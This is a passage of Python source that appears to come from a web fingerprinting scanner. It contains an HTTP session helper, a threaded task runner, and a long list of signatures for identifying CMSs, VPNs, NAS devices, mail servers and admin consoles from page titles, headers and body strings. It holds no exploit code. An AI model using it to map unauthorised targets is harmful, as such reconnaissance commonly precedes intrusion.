# ('Accept-Encoding', 'gzip, deflate'),
]
try:
return self.__GetHtml(data)
except:
self.html = ''
self.jumpurl = ''
return False
def __GetHtml(self, data):
try:
if data == None:
response = self.opener.open(self.url, timeout=10)
else:
response = self.opener.open(self.url, urllib.parse.urlencode(data), timeout=10)
self.html = response.read()
self.jumpurl = response.url
self.headers = dict(response.info())
return True
except urllib.error.HTTPError as e:
self.html = e.read()
self.jumpurl = e.url
self.headers = dict(response.info())
return True
except:
self.html = ''
self.jumpurl = ''
return False
def Update(self, url):
self.html = ''
self.jumpurl = ''
self.headers = ''
self.url = url
def AddCookie(self, name, value, site):
self.jar.set_cookie(HttpSession.make_cookie(name, value, site))
class Tasker():
def __init__(self, resource, threadsnum=5):
self.lock = threading.RLock()
self.taskpool = []
self.resource = resource
self.threadsnum = 5
self.bend = False
def run(self):
threads = []
t = threading.Thread(target=self.taskadder, args=())
t.start()
threads.append(t)
for i in range(0, self.threadsnum):
t = threading.Thread(target=self.taskgeter, args=())
t.start()
threads.append(t)
for t in threads:
t.join()
def taskadder(self):
if isinstance(self.resource, list):
for line in self.resource:
resolved = self.resolvetask(line)
self.taskpool += resolved
tmpfile = None
if isinstance(self.resource, str):
tmpfile = open(self.resource)
if isinstance(self.resource, io.IOBase) or tmpfile:
if not tmpfile:
tmpfile = self.resource
if tmpfile:
for line in tmpfile:
line = line.strip('\r\n')
while True:
self.lock.acquire()
if len(self.taskpool) > self.threadsnum * 3:
self.lock.release()
time.sleep(0.1)
continue
else:
resolved = self.resolvetask(line)
self.taskpool += resolved
self.lock.release()
break
self.lock.acquire()
self.bend = True
self.lock.release()
if isinstance(self.resource, str):
tmpfile.close()
def taskgeter(self):
currenttask = None
while True:
self.lock.acquire()
if len(self.taskpool) > 0:
currenttask = self.taskpool[0]
del self.taskpool[0]
self.lock.release()
else:
if self.bend:
self.lock.release()
return
self.lock.release()
time.sleep(0.1)
continue
self.taskprocesser(currenttask)
def taskprocesser(self, task):
sys.stdout.write(task + '\n')
def resolvetask(self, task):
return [task]
fingers = [
("ACSNO网络探针", "http://www.acsno.com.cn/product_view.php?id=78", "4/22/2015",
[{"title": ["探针管理与测试系统-登录界面"], "header": ["h123"]}]),
("网趣网上购物系统旗舰版", "http://www.cnhww.com/list.asp?id=8", "4/17/2015", [{"header": ["Set-Cookie: dmwh%5Fuser"]}, {
"body": ["class.asp?lx=tejia", "images/cnhww_css.css", "Wq_StranJF.js"]}]),
("网康 NS-ASG", "http://www.netentsec.com", "4/17/2015",
[{"title": ["NS-ASG"]}, {"body": ["commonplugin/softkeyboard.js"]}]),
("方维众筹", "http://www.fanwe.com/index.php?ctl=zongchou#yanshi", "4/17/2015",
[{"body": ["app/Tpl/fanwe_1/images/lazy_loading.gif", "index.php?ctl=article_cate"]}]),
("无忧购物系统ASP通用版", "http://www.gzwyshop.com/Pdt_zz.asp", "4/17/2015",
[{"body": ["images/loginh2.gif", "nsort.asp?sort_id="]}]),
("XYCMS", "http://www.yuleroom.cn/", "4/17/2015", [{"title": ["Powered by XYCMS"]}, {"body": ["advfile/ad12.js"]}]),
("JSPGOU", "http://demo3.jeecms.com/", "4/17/2015",
[{"title": ["Powered by JSPGOU"]}, {"body": ["/r/gou/www/css/", "shopMember/index.jspx"]}]),
("Jspxcms", "http://www.jspxcms.com/", "4/17/2015",
[{"title": ["Powerd by Jspxcms"]}, {"body": ["_files/jspxcms.css"]}]),
("惠尔顿上网行为管理系统", "http://www.wholeton.com/", "4/16/2015", [{"body": ["updateLoginPswd.php", "PassroedEle"]}]),
("milu_seotool", "http://addon.discuz.com/?ac=item&from=api_1&id=milu_seotool.plugin", "4/7/2015",
[{"body": ["plugin.php?id=milu_seotool"]}]),
("Privoxy", "http://www.privoxy.org", "4/7/2015", [{"header": ["Proxy-Agent: Privoxy"]}]),
("seeyoo广告机", "http://www.seeyoo.cn/", "3/30/2015", [{"body": ["AC_Config.js"]}]),
("埃森诺网络服务质量检测系统", "http://www.acsno.com.cn", "3/29/2015", [{"title": ["埃森诺网络服务质量检测系统"]}]),
("Mercurial", "http://mercurial.selenic.com/", "2/27/2015", [{"title": ["Mercurial repositories index"]}]),
("一采通", "http://www.1caitong.com", "1/27/2015", [{"body": ["/custom/GroupNewsList.aspx?GroupId="]}]),
("O2OCMS", "http://www.zzqss.com/", "1/26/2015", [{"body": ["/index.php/clasify/showone/gtitle/"]}]),
("全国烟草系统", "#", "1/26/2015", [{"body": ["ycportal/webpublish"]}]),
("万户网络", "http://www.wanhu.com.cn", "12/15/2014", [{"body": ["css/css_whir.css"]}]),
("ExtMail", "http://www.extmail.org", "12/15/2014",
[{"title": ["欢迎使用ExtMail"]}, {"body": ["setCookie('extmail_username"]}]),
("金龙卡金融化一卡通网站查询子系统", "http://www.posser.net/", "12/11/2014",
[{"title": ["金龙卡金融化一卡通网站查询子系统"]}, {"body": ["location.href=\"homeLogin.action"]}]),
("ezOFFICE", "http://www.whir.net/cn/ezofficeqyb/index_52.html", "12/11/2014",
[{"title": ["Wanhu ezOFFICE"]}, {"body": ["EZOFFICEUSERNAME"]}]),
("GlassFish", "https://glassfish.java.net", "12/11/2014", [{"header": ["Server: GlassFish Server"]}]),
("Piwigo", "http://cn.piwigo.org", "12/3/2014",
[{"body": ["generator\" content=\"Piwigo"]}, {"header": ["pwg_id"]}]),
("天柏在线培训/考试系统", "http://www.timber2005.com/", "12/2/2014",
[{"title": ["连接中,请稍候"], "header": ["index.html"]}, {"body": ["App_Image/PXSystem"]},
{"body": ["App_Image/System"]}]),
("Dorado", "http://bstek.com/product/dorado7_introduce", "12/2/2014", [{"title": ["Dorado Login Page"]}]),
("openEAP", "http://products.suntektech.com/products/archive.jsp?catid=327&id=269", "12/2/2014",
[{"title": ["openEAP_统一登录门户"]}]),
("hikashop", "http://www.hikashop.com", "11/28/2014", [{"body": ["/media/com_hikashop/css/"]}]),
("PigCms", "http://pigcms.com", "11/27/2014", [{"header": ["X-Powered-By: PigCms.com"]}]),
("帕拉迪统一安全管理和综合审计系统", "http://www.pldsec.com/", "11/26/2014", [{"body": ["module/image/pldsec.css"]}]),
("qibosoft v7", "http://www.qibosoft.com/", "11/25/2014", [{"body": ["/images/v7/cms.css\">"]}]),
("KXmail", "http://mail.pushmold.com", "11/25/2014",
[{"body": ["Powered By <a href=\"http://www.kxmail.net"]}, {"title": ["科信邮件系统"]}]),
("易创思ecs", "http://www.ecs.cn/", "11/25/2014", [{"body": ["src=\"/Include/EcsServerApi.js"]}]),
("URP 综合教务系统", "http://jwxt.bibt.edu.cn/", "11/25/2014",
[{"body": ["<input name=\"j_captcha_response\" type=\"hidden"]}, {"title": ["URP 综合教务系统"]}]),
("webbuilder", "http://www.putdb.com", "11/25/2014", [{"body": ["src=\"webbuilder/script/wb.js"]}]),
("e-Learning", "http://nvcc.cneln.net", "11/25/2014", [{"body": ["method=\"post\" action=\"/eln3_asp/login.do"]}]),
("ruvar", "http://gov.ruvar.com/", "11/25/2014", [{"body": [
"<iframe id=\"ifrm\" width=\"100%\" height=\"100%\" frameborder=\"0\" scrolling=\"no\" src=\"/include/login.aspx"]}]),
("acsoft", "http://ac.haidilao.com/", "11/25/2014", [{"body": ["login_1\">CA密码"]}, {"title": ["费用报销系统"]}]),
("lezhixing", "http://202.108.154.209/datacenter/#", "11/25/2014", [{"body": ["var contextPath = \"/datacenter"]}, {
"body": ["location.href=contextPath+\"/login/password/password.jsp"]}, {"body": [
"action=\"/datacenter/authentication/login.do\" method=\"post"]}]),
("yunyin", "http://press.njtu.edu.cn", "11/25/2014",
[{"body": ["技术支持:云因信息"]}, {"body": ["<a href=\"../scrp/getpassword.cfm"]},
{"body": ["/scrp/book.cfm\" method=\"post\">"]}]),
("某通用型政府cms", "http://www.wooyun.org/bugs/wooyun-2014-054821", "11/17/2014", [{"body": ["/deptWebsiteAction.do"]}]),
("U-Mail", "http://www.comingchina.com", "11/16/2014",
[{"body": ["<BODY LINK=\"White\" VLINK=\"White\" ALINK=\"White\">"]}]),
("IP.Board", "http://www.invisionpower.com/apps/board/", "11/13/2014", [{"body": ["ipb.vars"]}]),
("i@Report", "http://sanlink.com.cn", "11/11/2014",
[{"body": ["ESENSOFT_IREPORT_SERVER"]}, {"body": ["com.sanlink.server.Login"]}, {"body": ["ireportclient"]},
{"body": ["css/ireport.css"]}]),
("国家数字化学习资源中心系统", "http://ipv6.google.com.hk/#newwindow=1&q=%22技术支持:中央广播电视大学现代远程教育资源中心%22", "11/11/2014",
[{"title": ["页面加载中,请稍候"], "body": ["FrontEnd"]}]),
("UcSTAR", "http://www.qqtech.com/comm/index.htm", "11/11/2014", [{"title": ["UcSTAR 管理控制台"]}]),
("mod_antiloris", "http://sourceforge.net/projects/mod-antiloris/", "11/10/2014", [{"header": ["mod_antiloris"]}]),
("CISCO_VPN", "http://www.cisco.com/", "11/7/2014", [{"header": ["webvpn"]}]),
("Axis2", "http://axis.apache.org/axis2/", "11/7/2014",
[{"body": ["axis2-web/css/axis-style.css"]}, {"title": ["Axis 2 - Home"]}, {"title": ["Apache-Axis"]}]),
("Puppet_Node_Manager", "http://puppetlabs.com", "11/6/2014", [{"title": ["Puppet Node Manager"]}]),
("Kibana", "http://www.elasticsearch.org/overview/kibana/", "11/6/2014",
[{"title": ["Kibana"]}, {"body": ["kbnVersion"]}]),
("HAProxy_Report", "http://haproxy.com", "11/6/2014", [{"body": ["Statistics Report for HAProxy"]}]),
("Spark_Master", "http://spark.apache.org", "11/6/2014", [{"title": ["Spark Master at"]}]),
("Spark_Worker", "http://spark.apache.org", "11/6/2014", [{"title": ["Spark Worker at"]}]),
("GenieATM", "http://www.genienrm.com/index.php", "11/6/2014",
[{"title": ["GenieATM"]}, {"body": ["Copyright© Genie Networks Ltd."]}, {"body": ["defect 3531"]}]),
("dasannetworks", "http://www.dasannetworks.com/en/index.asp", "11/3/2014",
[{"body": ["clear_cookie(\"login\");"]}]),
("eagleeyescctv", "http://www.eagleeyescctv.com/", "11/3/2014",
[{"body": ["IP Surveillance for Your Life"]}, {"body": ["/nobody/loginDevice.js"]}]),
("Linksys_SPA_Configuration", "http://www.linksys.com", "11/3/2014", [{"title": ["Linksys SPA Configuration"]}]),
("CDR-Stats", "http://www.cdr-stats.org", "11/3/2014",
[{"title": ["CDR-Stats | Customer Interface"]}, {"body": ["/static/cdr-stats/js/jquery"]}]),
("SHOUTcast", "http://www.shoutcast.com", "11/3/2014", [{"title": ["SHOUTcast Administrator"]}]),
("SLTM32_Configuration", "http://www.lgericssonipecs.com", "11/3/2014",
[{"title": ["SLTM32 Web Configuration Pages "]}]),
("ntop", "https://www.ntop.org", "11/3/2014",
[{"body": ["Global Traffic Statistics"]}, {"header": ["Server: ntop"]}, {"body": ["ntopMenuID"]}]),
("SquirrelMail", "http://www.squirrelmail.org", "11/3/2014", [{"header": ["SQMSESSID"]}]),
("PineApp", "http://www.pineapp.com", "11/3/2014",
[{"title": ["PineApp WebAccess - Login"]}, {"body": ["/admin/css/images/pineapp.ico"]}]),
("Synology_DiskStation", "https://www.synology.com", "11/3/2014",
[{"title": ["Synology DiskStation"]}, {"body": ["SYNO.SDS.Session"]}]),
("OnSSI_Video_Clients", "http://www.onssi.com", "11/3/2014",
[{"title": ["OnSSI Video Clients"]}, {"body": ["x-value=\"On-Net Surveillance Systems Inc.\""]}]),
("LiteSpeed_Web_Admin_Console", "http://www.litespeedtech.com", "11/3/2014",
[{"title": ["LiteSpeed Web Admin Console"]}, {"header": ["LSWSWEBUI"]}]),
("FortiGuard", "http://www.fortiguard.com/static/webfiltering.html", "11/3/2014",
[{"body": ["FortiGuard Web Filtering"]}, {"title": ["Web Filter Block Override"]},
{"body": ["/XX/YY/ZZ/CI/MGPGHGPGPFGHCDPFGGOGFGEH"]}]),
("Centreon", "http://www.centreon.com", "11/3/2014",
[{"body": ["Generator\" content=\"Centreon - Copyright"]}, {"title": ["Centreon - IT & Network Monitoring"]}]),
("blog_fc2", "http://blog.fc2.com", "11/3/2014", [{"header": ["bloguid", "cookietest=test"]}]),
("shopify", "http://www.shopify.com", "11/3/2014", [{"header": ["X-Shopid:"]}]),
("sugon_gridview", "http://www.sugon.com/product/detail/productid/105.html", "10/29/2014",
[{"body": ["/common/resources/images/common/app/gridview.ico"]}]),
("concrete5", "http://www.concrete5.org", "10/26/2014",
[{"body": ["generator\" content=\"ezCMS"]}, {"header": ["CONCRETE5"]}, {"body": ["CCM_DISPATCHER_FILENAME"]}]),
("WebsiteBaker-CMS", "http://www.websitebaker-cms.de", "10/26/2014", [{"header": ["wb_session_id"]}]),
("DokuWiki", "https://www.dokuwiki.org", "10/26/2014",
[{"body": ["generator\" content=\"DokuWiki"]}, {"header": ["DokuWiki"]}]),
("Directadmin", "http://www.directadmin.com", "10/26/2014",
[{"header": ["X-Directadmin"]}, {"header": ["DirectAdmin Daemon"]}, {"title": ["DirectAdmin Login"]}]),
("Diferior", "http://diferior.com", "10/26/2014", [{"body": ["Powered by Diferior"]}]),
("DVWA", "http://www.dvwa.co.uk", "10/26/2014",
[{"title": ["Damn Vulnerable Web App"]}, {"body": ["dvwa/images/login_logo.png"]}]),
("wordpress_qTranslate", "http://www.qianqin.de/qtranslate/", "10/26/2014", [{"header": ["qtrans_cookie_test"]}]),
("网神VPN", "http://www.legendsec.com", "10/26/2014",
[{"body": ["admin/js/virtual_keyboard.js"]}, {"header": ["host_for_cookie"]}]),
("nginx_admin", "http://www.nginxcp.com", "10/26/2014", [{"header": ["nginx admin"]}]),
("Storm", "http://storm.apache.org", "10/24/2014", [{"title": ["Storm UI"]}, {"body": ["stormtimestr"]}]),
("Privoxy代理", "http://www.privoxy.org", "10/24/2014", [{"header": ["Privoxy"]}]),
("dayrui系列产品", "http://www.dayrui.com/product/", "10/23/2014",
[{"header": ["dr_ci_session"]}, {"body": ["dayrui/statics"]}]),
("FineCMS", "http://www.dayrui.com", "10/23/2014",
[{"body": ["Powered by FineCMS"]}, {"body": ["dayrui@gmail.com"]}, {"body": ["Copyright\" content=\"FineCMS"]}]),
("MaticsoftSNS_动软分享社区", "http://sns.maticsoft.com", "10/23/2014",
[{"body": ["MaticsoftSNS"]}, {"body": ["maticsoft", "/Areas/SNS/"]}]),
("Maticsoft_Shop_动软商城", "http://www.maticsoft.com/Products.aspx#shop", "10/23/2014",
[{"body": ["Maticsoft Shop"]}, {"body": ["maticsoft", "/Areas/Shop/"]}]),
("hishop", "http://www.hishop.com.cn", "10/23/2014",
[{"body": ["hishop.plugins.openid"]}, {"body": ["Hishop development team"]}]),
("北京阳光环球建站系统", "http://www.sunad.net.cn/wangzhanjianshe/", "10/22/2014", [{"body": ["bigSortProduct.asp?bigid"]}]),
("amazon-cloudfront", "http://aws.amazon.com/cn/cloudfront/", "10/22/2014", [{"header": ["X-Amz-Cf-Id"]}]),
("ecwapoa", "http://www.google.com.hk/#newwindow=1&q=ecwapoa", "10/22/2014", [{"body": ["ecwapoa"]}]),
("easysite", "http://huilan.com/zkhl/products/platform/easysite/index.html", "10/21/2014",
[{"body": ["GENERATOR\" content=\"EasySite"]}, {"body": ["Copyright 2009 by Huilan"]},
{"body": ["_DesktopModules_PictureNews"]}, {"header": ["EasySite-Compression"]}]),
("擎天电子政务", "http://www.skynj.com/cp/dzzw/index.htm", "10/21/2014",
[{"body": ["App_Themes/1/Style.css"]}, {"body": ["window.location = \"homepages/index.aspx"]},
{"body": ["homepages/content_page.aspx"]}]),
("asp168欧虎", "http://www.asp168.com", "10/21/2014",
[{"body": ["App_Themes/1/Style.css"]}, {"body": ["window.location = \"homepages/index.aspx"]},
{"body": ["homepages/content_page.aspx"]}]),
("锐捷应用控制引擎", "http://www.ruijie.com.cn/Product/Gateway/RG-ACE/RG-ACE", "10/21/2014",
[{"body": ["window.open(\"/login.do\",\"airWin"]}, {"title": ["锐捷应用控制引擎"]}]),
("TinyShop", "http://www.tinyrise.com/", "10/20/2014",
[{"body": ["var server_url = '/__con__/__act__';"]}, {"body": ["tiny_token_"]}]),
("ThinkSNS", "http://www.thinksns.com", "10/20/2014",
[{"body": ["_static/image/favicon.ico"]}, {"header": ["T3_lang"]}]),
("Piwik", "http://piwik.org", "10/20/2014", [{"header": ["PIWIK_SESSID"]}]),
("QingCloud", "https://www.qingcloud.com", "10/20/2014", [{"header": ["QINGCLOUDELB"]}]),
("RG-PowerCache内容加速系统", "http://www.ruijie.com.cn/", "10/17/2014", [{"title": ["RG-PowerCache"]}]),
("北京清科锐华CEMIS", "http://www.reachway.com.cn/web/cemis/introduction.aspx", "10/17/2014",
[{"body": ["/theme/2009/image", "login.asp"]}]),
("iredadmin(Roundcube?)", "http://www.iredmail.com", "10/17/2014",
[{"header": ["iredadmin"]}, {"body": ["iredadmin"]}]),
("SIMIT_framework", "", "10/16/2014", [{"header": ["SIMIT framework"]}]),
("flow_framework", "http://flow.typo3.org/home", "10/16/2014", [{"header": ["FLOW/FRAMEWORK"]}]),
("Kohana-Framework", "http://kohanaframework.org", "10/16/2014", [{"header": ["Kohana Framework"]}]),
("Restlet-Framework", "https://github.com/restlet/restlet-framework-java", "10/16/2014",
[{"header": ["Restlet-Framework"]}]),
("Play-Framework", "http://www.playframework.com", "10/16/2014", [{"header": ["Play! Framework"]}]),
("Starlet", "https://github.com/kazuho/Starlet", "10/16/2014", [{"header": ["Plack::Handler::Starlet"]}]),
("SamanPortal", "http://www.sis-eg.com", "10/16/2014", [{"header": ["sisRapid"]}]),
("Fat-FreeFramework", "http://fatfreeframework.com", "10/16/2014", [{"header": ["Fat-Free Framework"]}]),
("NetteFramework", "http://nette.org", "10/16/2014", [{"header": ["Nette Framework"]}]),
("typo3", "http://typo3.org", "10/15/2014", [{"header": ["fe_typo_user"]}]),
("irecms", "http://www.irecms.de", "10/15/2014", [{"header": ["IRe.CMS"]}]),
("MuraCMS", "http://www.getmura.com", "10/15/2014", [{"header": ["Mura CMS"]}]),
("Tncms",
"http://cn.bing.com/search?q=tncms+Xrds&go=提交&qs=n&form=QBRE&pq=tncms+xrds&sc=0-6&sp=-1&sk=&cvid=663f37af2cd849a0918ffe5212c56463",
"10/15/2014", [{"header": ["X-Tncms-Version"]}]),
("Azure_ARR",
"http://blogs.msdn.com/b/azchina/archive/2013/11/21/disabling-arr-s-instance-affinity-in-windows-azure-web-sites.aspx",
"10/15/2014", [{"header": ["ARRAffinity"]}]),
("sitecore", "http://www.sitecore.net", "10/15/2014", [{"header": ["Sitecore CMS"]}]),
("synkronvia", "http://synkronvia.com", "10/15/2014", [{"header": ["Synkron Via CMS"]}]),
("EasywebCMS", "http://www.eaysweb.se", "10/15/2014", [{"header": ["Easyweb CMS"]}]),
("UMI.CMS", "http://www.umi-cms.ru", "10/15/2014", [{"header": ["UMI.CMS"]}]),
("mozartframework", "http://mozartframework.ru", "10/15/2014", [{"header": ["Mozart Framework"]}]),
("zikula_framework", "http://zilkula.org", "10/14/2014",
[{"header": ["ZIKULASID1"]}, {"header": ["ZIKULASID2"]}, {"header": ["ZIKULASID3"]}]),
("Zikula_CMS", "http://www.zikula.de", "10/14/2014", [{"header": ["ZKSID2"]}]),
("Bad_Behavior", "http://bad-behavior.ioerror.us/", "10/14/2014", [{"header": ["bb2_screener_"]}]),
("Bigcommerce", "https://www.bigcommerce.com", "10/14/2014", [{"header": ["SHOP_SESSION_TOKEN"]}]),
("逐浪zoomla", "http://www.zoomla.cn", "10/14/2014",
[{"body": ["script src=\"http://code.zoomla.cn/"]}, {"body": ["NodePage.aspx", "Item"]},
{"body": ["/style/images/win8_symbol_140x140.png"]}]),
("微普外卖点餐系统", "http://diancan365.com/", "10/14/2014",
[{"body": ["Author\" content=\"微普外卖点餐系统"]}, {"body": ["Powered By 点餐系统"]}, {"body": ["userfiles/shoppics/"]}]),
("squarespace建站", "http://www.squarespace.com/", "10/14/2014", [{"header": ["SS_MID", "squarespace.net"]}]),
("PrestaShop", "http://www.prestashop.com", "10/13/2014",
[{"header": ["PrestaShop"]}, {"body": ["Shop powered by PrestaShop"]}]),
("ECMall", "http://ecmall.shopex.cn", "10/13/2014",
[{"header": ["ECM_ID"]}, {"body": ["generator\" content=\"ECMall"]}]),
("OpenCart", "http://www.opencart.com/", "10/13/2014",
[{"body": ["Powered By OpenCart"]}, {"body": ["catalog/view/theme"]}]),
("Magento", "http://magento.com", "10/13/2014",
[{"body": ["body", "BLANK_IMG"]}, {"body": ["Magento, Varien, E-commerce"]}]),
("Facebook_insights", "https://developers.facebook.com/docs/platforminsights", "10/13/2014",
[{"body": ["fb:app_id"]}]),
("北创图书检索系统", "http://www.bcrj.com.cn", "10/13/2014", [{"body": ["opac_two"]}]),
("Tipask", "http://www.tipask.com", "10/13/2014", [{"body": ["Tipask Team"]}]),
("HIMS酒店云计算服务", "http://www.luopan.cn", "10/13/2014",
[{"body": ["GB_ROOT_DIR", "maincontent.css"]}, {"body": ["HIMS酒店云计算服务"]}]),
("地平线CMS", "http://www.deepsoon.com/", "10/13/2014",
[{"title": ["Powered by deep soon"], "body": ["labelOppInforStyle"]},
{"body": ["search_result.aspx", "frmsearch"]}]),
("weebly", "http://www.weebly.com/", "10/13/2014",
[{"header": ["intern.weebly.net"]}, {"body": ["wsite-page-index"]}]),
("phpweb", "http://www.phpweb.net", "10/11/2014", [{"body": ["PDV_PAGENAME"]}]),
("Webmin", "http://www.webmin.cn", "10/11/2014", [{"title": ["Login to Webmin"]}, {"body": ["Webmin server on"]}]),
("mirapoint", "http://www.mirapoint.com", "10/10/2014", [{"body": ["/wm/mail/login.html"]}]),
("UFIDA_NC", "http://www.yonyou.com/product/NC.aspx", "10/10/2014", [{"body": ["UFIDA", "logo/images/"]}]),
("元年财务软件", "http://www.epochsoft.com.cn", "10/9/2014",
[{"body": ["yuannian.css"]}, {"body": ["/image/logo/yuannian.gif"]}]),
("正方教务管理系统", "http://www.zfsoft.com/type_jx/040000011001.html", "10/9/2014", [{"body": ["style/base/jw.css"]}]),
("BoyowCMS", "http://www.boyow.com/Index.html", "10/9/2014", [{"body": ["publish by BoyowCMS"]}]),
(
"ganglia", "http://ganglia.info", "10/9/2014", [{"body": ["ganglia_form.submit"]}, {"header": ["gs=unspecified"]}]),
("mantis", "http://www.mantisbt.org", "10/9/2014",
[{"body": ["browser_search_plugin.php?type=id"]}, {"body": ["MantisBT Team"]}]),
("创星伟业校园网群", "http://www.conking.com.cn", "10/9/2014", [{"body": ["javascripts/float.js", "vcxvcxv"]}]),
("TerraMaster", "http://www.terra-master.com/", "10/9/2014", [{"body": ["/js/common.js"], "title": ["vcxvcxv"]}]),
("OA企业智能办公自动化系统", "http://down.chinaz.com/soft/23657.htm", "10/9/2014",
[{"body": ["input name=\"S1\" type=\"image\"", "count/mystat.asp"]}]),
("anymacro", "http://www.anymacro.com", "10/9/2014",
[{"header": ["LOGIN_KEY"]}, {"body": ["document.aa.F_email"]}, {"body": ["AnyWebApp"]}]),
("iGENUS_webmail", "http://www.igenus.cn", "10/9/2014",
[{"body": ["script/logo_display_set.js", "check code"]}, {"body": ["top.location='login.php';"]},
{"body": ["iGENUS WEBMAIL SYSTEM"]}, {"body": ["css/igenus.css"]}]),
("gitlab", "https://about.gitlab.com/", "10/9/2014",
[{"header": ["_gitlab_session"]}, {"body": ["gon.default_issues_tracker"]},
{"body": ["GitLab Community Edition"]}]),
("trac", "http://trac.edgewall.org", "10/9/2014",
[{"body": ["<h1>Available Projects</h1>"]}, {"body": ["wiki/TracGuide"]}, {"header": ["trac_session"]}]),
("MRTG", "http://oss.oetiker.ch/mrtg/", "10/9/2014",
[{"body": ["Command line is easier to read using \"View Page Properties\" of your browser"]},
{"title": ["MRTG Index Page"]}, {"body": ["commandline was: indexmaker"]}]),
("opennms", "http://www.opennms.com", "10/9/2014",
[{"header": ["/opennms/login.jsp"]}, {"body": ["/css/gwt-asset.css"]},
{"body": ["OpenNMS® is a registered trademark of"]}]),
("Munin", "http://munin-monitoring.org", "10/9/2014",
[{"body": ["Auto-generated by Munin"]}, {"body": ["munin-month.html"]}]),
("Adiscon_LogAnalyzer", "http://loganalyzer.adiscon.com", "10/9/2014",
[{"title": ["Adiscon LogAnalyzer"]}, {"body": ["Adiscon LogAnalyzer", "Adiscon GmbH"]}]),
("Atmail", "https://www.atmail.com", "10/9/2014",
[{"body": ["Powered by Atmail"]}, {"header": ["atmail6"]}, {"body": ["FixShowMail"]}]),
("orocrm", "http://www.orocrm.com", "10/9/2014", [{"body": ["/bundles/oroui/"]}]),
("ALCASAR", "http://www.alcasar.net", "10/9/2014", [{"body": ["valoriserDiv5"]}]),
("Nagios", "http://www.nagios.org", "10/9/2014",
[{"header": ["Nagios access"]}, {"body": ["/nagios/cgi-bin/status.cgi"]}]),
("webEdition", "http://www.webedition.org", "10/9/2014", [{"body": ["generator\" content=\"webEdition"]}]),
("cart_engine", "http://www.c97.net", "10/8/2014", [{"body": ["skins/_common/jscripts.css"]}]),
("IPFire", "http://www.ipfire.org", "10/8/2014", [{"header": ["IPFire - Restricted"]}]),
("testlink", "http://testlink.org", "10/8/2014", [{"body": ["testlink_library.js"]}]),
("NOALYSS", "http://www.phpcompta.org", "10/8/2014", [{"title": ["NOALYSS"]}]),
("bacula-web", "http://www.bacula-web.org", "10/8/2014",
[{"title": ["Webacula"]}, {"title": ["Bacula Web"]}, {"title": ["Bacula-Web"]}]),
("Ultra_Electronics",
"http://en.wikipedia.org/wiki/NetillaOS_NetConnect_by_Northbridge_Secure_Systems_(Secure_Remote_Access_SSL_VPN)",
"10/8/2014", [{"body": ["/preauth/login.cgi"]}, {"body": ["/preauth/style.css"]}]),
("Osclass", "http://osclass.org/", "10/8/2014",
[{"body": ["generator\" content=\"Osclass"]}, {"header": ["osclass"]}]),
("hellobar", "http://hellobar.com", "10/8/2014", [{"body": ["hellobar.js"]}]),
("Django", "http://djangoproject.com", "10/8/2014",
[{"body": ["__admin_media_prefix__"]}, {"body": ["csrfmiddlewaretoken"]}]),
("cakephp", "http://cakephp.org", "10/8/2014", [{"header": ["CAKEPHP"]}]),
("51yes", "http://www.51yes.com", "10/8/2014", [{"body": ["51yes.com/click.aspx"]}]),
("recaptcha", "http://www.google.com/recaptcha/intro/index.html", "10/8/2014", [{"body": ["recaptcha_ajax.js"]}]),
("hubspot", "http://www.hubspot.com", "10/8/2014", [{"body": ["js.hubspot.com/analytics"]}]),
("Communique", "http://en.wikipedia.org/wiki/InSoft_Inc.#Communique", "10/8/2014", [{"header": ["Communique"]}]),
("Chromelogger", "http://craig.is/writing/chrome-logger/techspecs", "10/4/2014",
[{"header": ["X-Chromelogger-Data"]}]),
("OpenMas", "http://zj.chinamobile.com", "10/4/2014",
[{"title": ["OpenMas"]}, {"body": ["loginHead\"><link href=\"App_Themes"]}]),
("Hudson", "http://hudson-ci.org", "9/30/2014", [{"header": ["X-Hudson"]}]),
("Splunk", "http://www.splunk.com", "9/30/2014", [{"body": ["Splunk.util.normalizeBoolean"]}]),
("zenoss", "http://www.zenoss.com", "9/30/2014", [{"body": ["/zport/dmd/"]}]),
("Synology_NAS", "http://www.synology.com", "9/29/2014",
[{"header": ["webman/index.cgi"]}, {"body": ["modules/BackupReplicationApp"]}]),
("cpanel", "http://cpanel.net", "9/28/2014", [{"header": ["cprelogin:"]}]),
("WebObjects", "http://wiki.wocommunity.org/display/WEB/Home", "9/28/2014", [{"header": ["WebObjects", "wosid"]}]),
("梭子鱼防火墙", "https://www.barracuda.com/", "9/28/2014",
[{"body": ["a=bsf_product\" class=\"transbutton", "/cgi-mod/header_logo.cgi"]}]),
("梭子鱼设备", "http://www.barracudanetworks.com", "9/28/2014", [{"header": ["BarracudaHTTP"]}]),
("PHP-CGI", "http://baidu.com/?q=PHP-CGI", "9/28/2014", [{"header": ["PHP-CGI"]}]),
("微门户", "http://www.tvm.cn", "9/25/2014", [{"body": ["/tpl/Home/weimeng/common/css/"]}]),
("Amaya", "http://www.w3.org/Amaya", "9/22/2014", [{"body": ["generator\" content=\"Amaya"]}]),
("AlloyUI", "http://www.alloyui.com", "9/22/2014", [{"body": ["cdn.alloyui.com"]}]),
("Akamai", "http://akamai.com", "9/22/2014", [{"header": ["X-Akamai-Transformed"]}]),
("advancedwebstats", "http://www.advancedwebstats.com", "9/22/2014", [{"body": ["caphyon-analytics.com/aws.js"]}]),
("adriver", "http://adriver.ru", "9/22/2014", [{"body": ["ad.adriver.ru/cgi-bin"]}]),
("Adobe_RoboHelp", "http://adobe.com/products/robohelp.html", "9/22/2014",
[{"body": ["generator\" content=\"Adobe RoboHelp"]}]),
("Adobe_GoLive", "http://www.adobe.com/products/golive", "9/22/2014",
[{"body": ["generator\" content=\"Adobe GoLive"]}]),
("Adobe_ CQ5", "http://adobe.com/products/cq.html", "9/22/2014", [{"body": ["_jcr_content"]}]),
("ColdFusion", "http://adobe.com/products/coldfusion-family.html", "9/22/2014",
[{"body": ["/cfajax/"]}, {"header": ["CFTOKEN"]}, {"body": ["ColdFusion.Ajax"]}, {"body": ["cdm"]}]),
("adinfinity", "http://adinfinity.com.au", "9/22/2014", [{"body": ["adinfinity.com.au/adapt"]}]),
("addthis", "http://addthis.com", "9/22/2014", [{"body": ["addthis.com/js/"]}]),
("phpDocumentor", "http://www.phpdoc.org", "9/22/2014", [{"body": ["Generated by phpDocumentor"]}]),
("Open_AdStream", "http://xaxis.com/", "9/22/2014", [{"body": ["OAS_AD"]}]),
("Google_AdSense", "https://www.google.com/adsense", "9/22/2014", [{"body": ["googlesyndication"]}]),
("3DCART", "http://www.3dcart.com", "9/22/2014", [{"header": ["X-Powered-By: 3DCART"]}]),
("2z project", "http://2zproject-cms.ru", "9/22/2014", [{"body": ["Generator\" content=\"2z project"]}]),
